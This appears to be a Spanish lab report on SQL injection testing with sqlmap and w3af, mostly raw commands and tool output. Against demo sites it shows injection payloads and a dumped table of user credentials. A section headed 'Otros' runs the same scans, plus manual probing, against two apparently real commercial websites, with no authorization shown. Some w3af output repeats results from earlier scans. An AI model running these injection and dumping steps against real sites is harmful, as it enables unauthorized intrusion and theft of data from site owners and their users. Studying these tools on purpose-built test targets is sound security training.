SQL Injection 3

SEGURIDAD

Iván Martín Valderas

SQL [

INJECTION

(III) ]

Contenido

1. http://zero.webappsecurity.com ............................................................................ 2

....................................................................................................................... 2 A) SQLmap

b) W3af ................................................................................................................................... 8

2. http://crackme.cenzic.com/Kelev/view/home.php ........................................... 10

........................................................................................................................... 10 A) SQLmap

b) W3af ................................................................................................................................. 13

3. Otros: ............................................................................................................................ 14

http://www.arocariaflowers.com/article.php?id=%275 ............................................. 14

........................................................................................................................... 14 A) SQLmap

B) W3af ................................................................................................................................ 15

........................................................................................................................... 16 A) SQLmap

B) W3af .............................................................................................................................. 17

1. http://zero.webappsecurity.com

A) SQLmap

root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://zero.webappsecurity.com/forgot1.asp?get=email@addres s.com" --level=3 --risk=3 --flush-session --technique=B --batch [*] starting at: 15:19:19 [15:19:19] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.web appsecurity.com/session' as session file [15:19:19] [INFO] flushing session file [15:19:19] [INFO] testing connection to the target url [15:19:20] [INFO] heuristics detected web page charset 'ascii' [15:19:20] [INFO] sqlmap got a 302 redirect to 'http://zero.webappsecurity.com:8 0/forgot2.asp'. do you want to follow redirects from now on (or stay on the orig inal page)? [Y/n] Y [15:19:20] [INFO] testing if the url is stable, wait a few seconds [15:19:23] [INFO] url is stable [15:19:23] [INFO] testing if GET parameter 'get' is dynamic [15:19:24] [WARNING] GET parameter 'get' appears to be not dynamic [15:19:25] [WARNING] heuristic test shows that GET parameter 'get' might not be injectable [15:19:25] [INFO] testing sql injection on GET parameter 'get' [15:19:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [15:20:09] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' [15:20:41] [INFO] GET parameter 'get' is 'OR boolean-based blind - WHERE or HAVI NG clause' injectable [15:20:41] [INFO] checking if the injection point on GET parameter 'get' is a fa lse positive [15:20:44] [INFO] GET parameter 'get' is vulnerable. Do you want to keep testing the others? [y/N] N sqlmap identified the following injection points with a total of 88 HTTP(s) requ ests: --- Place: GET Parameter: get Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP --- [15:20:44] [INFO] manual usage of GET payloads requires url encoding

[15:20:44] [INFO] testing Microsoft Access [15:20:45] [INFO] confirming Microsoft Access [15:20:46] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0 back-end DBMS: Microsoft Access [15:20:46] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 24 times [15:20:46] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s qlmap/trunk/sqlmap/output/zero.webappsecurity.com'

http://zero.webappsecurity.com/

root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://zero.webappsecurity.com

/[email protected]" --batch --tables --threads=8 [*] starting at: 15:26:44 [15:26:44] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.web appsecurity.com/session' as session file [15:26:44] [INFO] resuming injection data from session file [15:26:44] [INFO] resuming back-end DBMS 'microsoft access' from session file [15:26:57] [INFO] testing connection to the target url [15:26:58] [INFO] heuristics detected web page charset 'ascii' [15:26:58] [INFO] sqlmap got a 302 redirect to 'http://zero.webappsecurity.com:8 0/forgot2.asp'. do you want to follow redirects from now on (or stay on the orig inal page)? [Y/n] Y sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: get Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP --- [15:26:58] [INFO] manual usage of GET payloads requires url encoding [15:26:58] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0 back-end DBMS: Microsoft Access [15:26:58] [INFO] fetching tables for database: `Microsoft_Access_masterdb` [15:26:58] [INFO] fetching number of tables for database '`Microsoft_Access_mast erdb`' [15:26:59] [INFO] retrieved: [15:27:01] [WARNING] unable to retrieve the number of tables for database '`Micr osoft_Access_masterdb`' [15:27:01] [ERROR] cannot retrieve table names, back-end DBMS is Access [15:27:01] [INFO] do you want to use common table existence check? [Y/n/q] Y [15:27:01] [INFO] checking table existence using items from '/home/stamparm/Work /sqlmap/trunk/sqlmap/txt/common-tables.txt' [15:27:01] [INFO] adding words used on web page to the check list [15:27:01] [INFO] starting 8 threads [15:28:56] [INFO] retrieved: password

Database: Microsoft_Access_masterdb [1 table] +----------+ | password | +----------+ [15:30:22] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 3091 times [15:30:22] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s qlmap/trunk/sqlmap/output/zero.webappsecurity.com' [*] shutting down at: 15:30:22

root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://zero.webappsecurity.com /[email protected]" --batch --columns -T password --threads=8 [15:30:38] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.web appsecurity.com/session' as session file [15:30:38] [INFO] resuming injection data from session file [15:30:38] [INFO] resuming back-end DBMS 'microsoft access' from session file [15:30:38] [INFO] resuming brute forced table name 'password' from session file [15:30:48] [INFO] testing connection to the target url [15:30:49] [INFO] heuristics detected web page charset 'ascii' [15:30:49] [INFO] sqlmap got a 302 redirect to 'http://zero.webappsecurity.com:8 0/forgot2.asp'. do you want to follow redirects from now on (or stay on the orig inal page)? [Y/n] Y sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: get Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP --- [15:30:49] [INFO] manual usage of GET payloads requires url encoding [15:30:49] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0 back-end DBMS: Microsoft Access [15:30:49] [ERROR] cannot retrieve column names, back-end DBMS is Access [15:30:49] [INFO] do you want to use common columns existence check? [Y/n/q] Y [15:30:49] [INFO] checking column existence using items from '/home/stamparm/Wor k/sqlmap/trunk/sqlmap/txt/common-columns.txt' [15:30:49] [INFO] starting 8 threads [15:30:52] [INFO] retrieved: name [15:30:56] [INFO] retrieved: country [15:30:59] [INFO] retrieved: surname [15:31:25] [INFO] retrieved: pass [15:31:25] [INFO] retrieved: user [15:31:32] [INFO] retrieved: admin [15:32:53] [INFO] retrieved: active

Database: `Microsoft_Access_masterdb` Table: password [7 columns] +---------+-------------+ | Column | Type | +---------+-------------+ | active | non-numeric | | admin | non-numeric | | country | non-numeric | | name | non-numeric | | pass | non-numeric | | surname | non-numeric | | user | non-numeric | +---------+-------------+ [15:33:31] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 2442 times [15:33:31] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s qlmap/trunk/sqlmap/output/zero.webappsecurity.com'

root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://zero.webappsecurity.com /[email protected]" --batch --dump -T password -C admin,pass,sur name,user --threads=8 --fresh-queries [15:39:41] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.web appsecurity.com/session' as session file [15:39:41] [INFO] resuming injection data from session file [15:39:41] [INFO] resuming back-end DBMS 'microsoft access' from session file [15:39:41] [INFO] resuming brute forced table name 'password' from session file [15:39:41] [INFO] resuming brute forced column name 'name' for table 'password' from session file [15:39:41] [INFO] resuming brute forced column name 'country' for table 'passwor d' from session file [15:39:41] [INFO] resuming brute forced column name 'surname' for table 'passwor d' from session file [15:39:41] [INFO] resuming brute forced column name 'pass' for table 'password' from session file [15:39:41] [INFO] resuming brute forced column name 'user' for table 'password' from session file [15:39:41] [INFO] resuming brute forced column name 'admin' for table 'password' from session file [15:39:41] [INFO] resuming brute forced column name 'active' for table 'password ' from session file [15:39:41] [INFO] resuming brute forced column name 'name' for table 'password' from session file [15:39:53] [INFO] testing connection to the target url [15:39:54] [INFO] heuristics detected web page charset 'ascii' [15:39:54] [INFO] sqlmap got a 302 redirect to 'http://zero.webappsecurity.com:8 0/forgot2.asp'. do you want to follow redirects from now on (or stay on the orig inal page)? [Y/n] Y sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: get Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: get=-9653' OR NOT (7754=7754) AND 'cxJP'='cxJP --- [15:39:55] [INFO] manual usage of GET payloads requires url encoding [15:39:55] [INFO] the back-end DBMS is Microsoft Access web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0 back-end DBMS: Microsoft Access [15:39:55] [ERROR] cannot retrieve column names, back-end DBMS is Access [15:39:55] [INFO] fetching column(s) 'admin, surname, user, pass' entries for ta ble 'password' on database 'Microsoft_Access_masterdb' [15:39:55] [INFO] fetching number of columns 'admin, surname, user, pass' entrie s for table 'password' on database 'Microsoft_Access_masterdb' [15:39:56] [INFO] retrieved: 73 [15:40:04] [INFO] fetching number of distinct values for column 'user' [15:40:04] [INFO] retrieved: 7 [15:40:12] [INFO] fetching number of distinct values for column 'pass' [15:40:12] [INFO] retrieved: 6 [15:40:21] [INFO] fetching number of distinct values for column 'admin' [15:40:21] [INFO] retrieved: 2 [15:40:29] [INFO] fetching number of distinct values for column 'surname' [15:40:29] [INFO] retrieved: 5 [15:40:36] [WARNING] no proper pivot column provided (with unique values). all r ows can't be retrieved. [15:40:36] [INFO] retrieving the length of query output [15:40:36] [INFO] retrieved: 11 [15:40:51] [INFO] retrieved: 576-11-1121 [15:40:51] [INFO] retrieving the length of query output

[15:40:51] [INFO] retrieved: 4 [15:41:04] [INFO] retrieved: pass [15:41:04] [INFO] retrieving the length of query output [15:41:04] [INFO] retrieved: 2 [15:41:14] [INFO] retrieved: no [15:41:14] [INFO] retrieving the length of query output [15:41:14] [INFO] retrieved: 5 [15:41:25] [INFO] retrieved: Shawn [15:41:25] [INFO] retrieving the length of query output [15:41:25] [INFO] retrieved: 11 [15:41:41] [INFO] retrieved: 576-14-1122 [15:41:41] [INFO] retrieving the length of query output [15:41:41] [INFO] retrieved: 5 [15:41:51] [INFO] retrieved: divad [15:41:51] [INFO] retrieving the length of query output [15:41:51] [INFO] retrieved: 2 [15:42:02] [INFO] retrieved: no [15:42:02] [INFO] retrieving the length of query output [15:42:02] [INFO] retrieved: [15:42:03] [INFO] retrieved: [15:42:06] [INFO] retrieving the length of query output [15:42:06] [INFO] retrieved: 11 [15:42:22] [INFO] retrieved: 592-11-8393 [15:42:22] [INFO] retrieving the length of query output [15:42:22] [INFO] retrieved: 4 [15:42:32] [INFO] retrieved: pass [15:42:32] [INFO] retrieving the length of query output [15:42:32] [INFO] retrieved: 2 [15:42:43] [INFO] retrieved: no [15:42:43] [INFO] retrieving the length of query output [15:42:43] [INFO] retrieved: [15:42:44] [INFO] retrieved: [15:42:47] [INFO] retrieving the length of query output [15:42:47] [INFO] retrieved: 11 [15:43:03] [INFO] retrieved: 991-99-8765 [15:43:03] [INFO] retrieving the length of query output [15:43:03] [INFO] retrieved: 14 [15:43:21] [INFO] retrieved: canwehavemoney [15:43:21] [INFO] retrieving the length of query output [15:43:21] [INFO] retrieved: 2 [15:43:31] [INFO] retrieved: no [15:43:31] [INFO] retrieving the length of query output [15:43:31] [INFO] retrieved: [15:43:33] [INFO] retrieved: [15:43:36] [INFO] retrieving the length of query output [15:43:36] [INFO] retrieved: 5 [15:43:46] [INFO] retrieved: admin [15:43:46] [INFO] retrieving the length of query output [15:43:46] [INFO] retrieved: 5 [15:43:57] [INFO] retrieved: admin [15:43:57] [INFO] retrieving the length of query output [15:43:57] [INFO] retrieved: 3 [15:44:08] [INFO] retrieved: yes [15:44:08] [INFO] retrieving the length of query output [15:44:08] [INFO] retrieved: 5 [15:44:20] [INFO] retrieved: Admin [15:44:20] [INFO] retrieving the length of query output [15:44:20] [INFO] retrieved: 13 [15:44:44] [INFO] retrieved: [email protected] [15:44:44] [INFO] retrieving the length of query output [15:44:44] [INFO] retrieved: 10 [15:45:02] [INFO] retrieved: bleh88bleh [15:45:02] [INFO] retrieving the length of query output [15:45:02] [INFO] retrieved: 2 [15:45:12] [INFO] retrieved: no [15:45:12] [INFO] retrieving the length of query output [15:45:12] [INFO] retrieved: 8 [15:45:24] [INFO] retrieved: blehbleh [15:45:24] [INFO] retrieving the length of query output [15:45:24] [INFO] retrieved: 4 [15:45:33] [INFO] retrieved: user

[15:45:33] [INFO] retrieving the length of query output [15:45:33] [INFO] retrieved: 4 [15:45:42] [INFO] retrieved: user [15:45:42] [INFO] retrieving the length of query output [15:45:42] [INFO] retrieved: 2 [15:45:53] [INFO] retrieved: no [15:45:53] [INFO] retrieving the length of query output [15:45:53] [INFO] retrieved: 4 [15:46:02] [INFO] retrieved: User [15:46:02] [INFO] retrieving the length of query output [15:46:02] [INFO] retrieved: [15:46:03] [INFO] retrieved:

Database: Microsoft_Access_masterdb Table: password [7 entries] +-------+----------------+----------+---------------+ | admin | pass | surname | user | +-------+----------------+----------+---------------+ | no | pass | Shawn | 576-11-1121 | | no | divad | NULL | 576-14-1122 | | no | pass | NULL | 592-11-8393 | | no | canwehavemoney | NULL | 991-99-8765 | | yes | admin | Admin | admin | | no | bleh88bleh | blehbleh | [email protected] | | no | user | User | user | +-------+----------------+----------+---------------+ [15:46:06] [INFO] Table 'Microsoft_Access_masterdb.password' dumped to CSV file '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/zero.webappsecurity.com/dump/Mic rosoft_Access_masterdb/password.csv' [15:46:06] [WARNING] HTTP error codes detected during testing: 500 (Internal Server Error) - 715 times [15:46:06] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s qlmap/trunk/sqlmap/output/zero.webappsecurity.com'

http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html

http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html

b) W3af

Primero configuramos el programa, en modo consola desde BackTrack5:

w3af>>> plugins

w3af/plugins>>> audit sqli

w3af/plugins>>> output console,textFile

w3af/plugins>>> output config textFile

w3af/plugins/output/config:textFile>>> set fileName prueba.txt

w3af/plugins/output/config:textFile>>> back

w3af/plugins>>> back

Ejecutamos un escaneo:

w3af>>> target

w3af/config:target>>> set target http://zero.webappsecurity.com

w3af/config:target>>> back

w3af>>> start

Auto-enabling plugin: grep.error500

Found 3 URLs and 5 different points of injection.

The list of URLs is:

- http://zero.webappsecurity.com

- http://zero.webappsecurity.com/login1.asp

- http://zero.webappsecurity.com/rootlogin.asp

The list of fuzzable requests is:

- http://zero.webappsecurity.com | Method: GET

- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="",

graphicOption="minimum")


graphicOption="minimum", graphicOption="standard")


graphicOption="standard")

- http://zero.webappsecurity.com/rootlogin.asp | Method: POST | Parameters: (txtPassPhrase="",

txtHidden="This was h...", txtName="")

A SQL error was found in the response supplied by the web application, the error is (only a fragment is

shown): "'80040e14'". The error was found on response with id 23.


shown): "Microsoft OLE DB Provider for ODBC Drivers". The error was found on response with id 23.


shown): "[Microsoft][ODBC Microsoft Access Driver]". The error was found on response with id 23.

SQL injection in a Microsoft SQL database was found at: "http://zero.webappsecurity.com/login1.asp",

using HTTP method POST. The sent post-data was:

"login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified

parameter was "login". This vulnerability was found in the request with id 23.

Scan finished in 20 seconds.

w3af>>>

http://www.pentester.es/2010/02/auditoria-web-w3af-en-el-dojo.html

http://www.pentester.es/2010/02/auditoria-web-w3af-en-el-dojo.html

2. http://crackme.cenzic.com/Kelev/view/home.php

A) SQLmap root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://crackme.cenzic.com/Kelev/view/upd ateloanrequest.php" --data "txtFirstName=Joza&txtLastName=Jozic&txtSocialScurity No=112-12-3222&txtDOB=1981-11-11&txtAddress=Gornje+Jelenje+3&txtCity=BlizuTamo&d rpState=&txtTelephoneNo=&txtEmail=joza.jozic%40gmail.com&txtAnnualIncome=10212&d rpLoanType=Home&sendbutton1=Submit" --batch --banner --flush-session -p txtAnnua lIncome --level=3 --risk=3 [16:52:00] [INFO] using 'pentest/database/sqlmap/output/crackme.cenzic.com/session' a s session file [16:52:00] [INFO] flushing session file [16:52:00] [INFO] testing connection to the target url [16:52:01] [INFO] testing if the url is stable, wait a few seconds [16:52:03] [INFO] url is stable [16:52:04] [INFO] heuristic test shows that POST parameter 'txtAnnualIncome' mig ht be injectable (possible DBMS: MySQL) [16:52:04] [INFO] testing sql injection on POST parameter 'txtAnnualIncome' [16:52:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [16:52:39] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause' [16:53:41] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Gene ric comment)' [16:54:31] [INFO] testing 'Generic boolean-based blind - Parameter replace (orig inal value)' [16:54:33] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c lauses' [16:54:35] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ L comment)' [16:55:40] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (R LIKE)' [16:56:15] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S ET - original value)' [16:56:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)' [16:56:20] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' [16:56:22] [INFO] testing 'MySQL stacked conditional-error blind queries' [16:57:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [16:57:23] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause ' [16:57:41] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' [16:58:15] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause' [16:59:00] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' [16:59:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' [16:59:38] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clau ses' [16:59:39] [INFO] testing 'MySQL > 5.0.11 stacked queries' [16:59:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [17:00:13] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [17:00:32] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)' [17:01:32] [INFO] POST parameter 'txtAnnualIncome' is 'MySQL < 5.0.12 AND time-b ased blind (heavy query)' injectable [17:01:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [17:01:44] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns' [17:01:53] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns' [17:02:03] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns' [17:02:12] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns' [17:02:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[17:02:31] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns ' [17:02:40] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns' [17:02:50] [INFO] testing 'Generic UNION query (random number) - 11 to 20 column s' [17:03:05] [INFO] target url appears to be UNION injectable with 12 columns [17:03:31] [WARNING] if UNION based SQL injection is not detected, please consid er providing --union-char switch (e.g. --union-char=1) and/or try to force the b ack-end DBMS (e.g. --dbms=mysql) [17:03:31] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns' [17:03:40] [INFO] checking if the injection point on POST parameter 'txtAnnualIn come' is a false positive POST parameter 'txtAnnualIncome' is vulnerable. Do you want to keep testing the others? [y/N] N sqlmap identified the following injection points with a total of 619 HTTP(s) req uests: --- Place: POST Parameter: txtAnnualIncome Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: txtFirstName=Joza&txtLastName=Jozic&txtSocialScurityNo=112-12-3222& txtDOB=1981-11-11&txtAddress=Gornje Jelenje 3&txtCity=BlizuTamo&drpState=&txtTel ephoneNo=&[email protected]&txtAnnualIncome=10212 AND 7764=BENCHMARK (5000000,MD5(CHAR(83,69,77,114)))&drpLoanType=Home&sendbutton1=Submit --- [17:04:37] [INFO] testing MySQL [17:05:01] [INFO] confirming MySQL [17:05:50] [WARNING] adjusting time delay to 3 seconds (due to good response tim es) [17:05:50] [INFO] the back-end DBMS is MySQL [17:05:50] [INFO] fetching banner [17:05:50] [INFO] retrieved: 4.0.18-nt

web server operating system: Windows web application technology: Apache 2.0.49, PHP 4.3.7 back-end DBMS operating system: Windows back-end DBMS: MySQL < 5.0.0 banner: '4.0.18-nt'

root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://crackme.cenzic.com/Kelev/view/upd ateloanrequest.php" --data "txtFirstName=Joza&txtLastName=Jozic&txtSocialScurity No=112-12-3222&txtDOB=1981-11-11&txtAddress=Gornje+Jelenje+3&txtCity=BlizuTamo&d rpState=&txtTelephoneNo=&txtEmail=joza.jozic%40gmail.com&txtAnnualIncome=10212&d rpLoanType=Home&sendbutton1=Submit" --batch --current-db [17:16:15] [INFO] using 'pentest/database/sqlmap/output/crackme.cenzic.com/session' a s session file [17:16:15] [INFO] resuming injection data from session file [17:16:15] [INFO] resuming back-end DBMS 'mysql 4' from session file [17:16:15] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: POST Parameter: txtAnnualIncome Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: txtFirstName=Joza&txtLastName=Jozic&txtSocialScurityNo=112-12-3222& txtDOB=1981-11-11&txtAddress=Gornje Jelenje 3&txtCity=BlizuTamo&drpState=&txtTel ephoneNo=&[email protected]&txtAnnualIncome=10212 AND 7764=BENCHMARK (5000000,MD5(CHAR(83,69,77,114)))&drpLoanType=Home&sendbutton1=Submit --- [17:16:16] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.0.49, PHP 4.3.7 back-end DBMS: MySQL 4 [17:16:16] [INFO] fetching current database [17:16:16] [WARNING] time-based comparison needs larger statistical model. Makin g a few dummy requests, please wait..

[17:17:42] [WARNING] adjusting time delay to 1 second (due to good response times) bank current database: 'bank' [17:16:31] [INFO] Fetched data logged to text files under '/Pentest/database/sqlmap/ou Tput/crackme.cenzic.com' [*] shutting down at 17:16:31

http://unconciousmind.blogspot.com/2011/06/sqlmap-vs-cenzic-php-testing-web-server.html

http://unconciousmind.blogspot.com/2011/06/sqlmap-vs-cenzic-php-testing-web-server.html

b) W3af

w3af>>> target

w3af/config:target>>> set target http://zero.webappsecurity.com


w3af>>> start














- http://zero.webappsecurity.com/rootlogin.asp | Method: POST | Parameters: (txtPassPhrase="",

txtHidden="This was h...", txtName="")

SQL injection in a Microsoft SQL database was found at: "http://zero.webappsecurity.com/login1.asp",

using HTTP method POST. The sent post-data was:

"login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified

parameter was "login". This vulnerability was found in the request with id 23.


w3af>>>

3. Otros:

http://www.arocariaflowers.com/article.php?id=%275

A) SQLmap

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u

"http://www.arocariaflowers.com/article.php?id=%275" -b

[19:18:56] [INFO] using '/pentest/database/sqlmap/output/www.arocariaflowers.com/session' as session file

[19:18:56] [INFO] testing connection to the target url

[19:18:56] [INFO] heuristics detected web page charset 'ascii'

[19:18:56] [INFO] testing if the url is stable, wait a few seconds

[19:18:58] [INFO] url is stable

[19:18:58] [INFO] testing if GET parameter 'id' is dynamic

[19:18:58] [INFO] confirming that GET parameter 'id' is dynamic

[19:18:59] [INFO] GET parameter 'id' is dynamic

[19:18:59] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable

[19:18:59] [INFO] testing sql injection on GET parameter 'id'

[19:18:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[19:19:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other

DBMSes? [Y/n] y

[19:19:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[19:19:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[19:19:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[19:19:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[19:19:23] [WARNING] GET parameter 'id' is not injectable

[19:19:23] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun

by providing either a valid --string or a valid --regexp, refer to the user's manual for details

[19:19:23] [WARNING] HTTP error codes detected during testing:

404 (Not Found) - 88 times

A pesar de que la página estuviera en la lista, no posee vulnerabilidad con SQLmap, a mano tampoco se

ha detectado ninguna, posiblemente se halla solucionado.

B) W3af

w3af>>> target

w3af/config:target>>> set target http://www.arocariaflowers.com/article.php


w3af>>> start






- http://www.arocariaflowers.com/article.php


- http://www.arocariaflowers.com/article.php | Method: GET








- http://zero.webappsecurity.com/rootlogin.asp | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This

was h...", txtName="")

SQL injection in a Microsoft SQL database was found at: "http://zero.webappsecurity.com/login1.asp", using HTTP

method POST. The sent post-data was:

"login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter

was "login". This vulnerability was found in the request with id 23.


w3af>>>

Como podemos ver, al no

borrar los anteriores escaneos,

se mantienen asique ponemos

en negrita el actual

http://www.bloomhealth.net/news/article.php?id='48

A) SQLmap

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u

"http://www.bloomhealth.net/news/article.php?id='48" -b

[19:24:28] [INFO] using '/pentest/database/sqlmap/output/www.bloomhealth.net/session' as session file

[19:24:28] [INFO] testing connection to the target url

[19:24:28] [INFO] testing if the url is stable, wait a few seconds

[19:24:30] [INFO] url is stable

[19:24:30] [INFO] testing if GET parameter 'id' is dynamic

[19:24:30] [WARNING] GET parameter 'id' appears to be not dynamic

[19:24:31] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable

[19:24:31] [INFO] testing sql injection on GET parameter 'id'

[19:24:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[19:24:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[19:24:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[19:24:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[19:24:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[19:24:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[19:24:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[19:24:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[19:24:57] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[19:24:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[19:25:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[19:25:02] [INFO] testing 'Oracle AND time-based blind'

[19:25:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[19:25:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[19:25:22] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS

[19:25:44] [WARNING] GET parameter 'id' is not injectable

[19:25:44] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun

by providing either a valid --string or a valid --regexp, refer to the user's manual for details

Encontramos otra no injectable

http://www.bloomhealth.net/news/article.php?id='48

B) W3af

w3af>>> target

w3af/config:target>>> set target http://www.bloomhealth.net/news/article.php


w3af>>> start



- http://www.bloomhealth.net/news/article.php




- http://www.arocariaflowers.com/article.php


- http://www.arocariaflowers.com/article.php | Method: GET

- http://www.bloomhealth.net/news/article.php | Method: GET








- http://zero.webappsecurity.com/rootlogin.asp | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This

was h...", txtName="")

SQL injection in a Microsoft SQL database was found at: "http://zero.webappsecurity.com/login1.asp", using HTTP

method POST. The sent post-data was:

"login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter

was "login". This vulnerability was found in the request with id 23.


w3af>>>

Como hemos podido comprobar en los 2 últimos escaneos, estamos ante un conflicto

de programas, SQLmap por una parte no encuentra ninguna vulnerabilidad mientras

que w3af sí.

Ahí es donde entra el recurso humano, aunque hemos probado a mano 6 no hemos

encontrado ninguna vulnerabilidad.

Documents

SQL Injection 3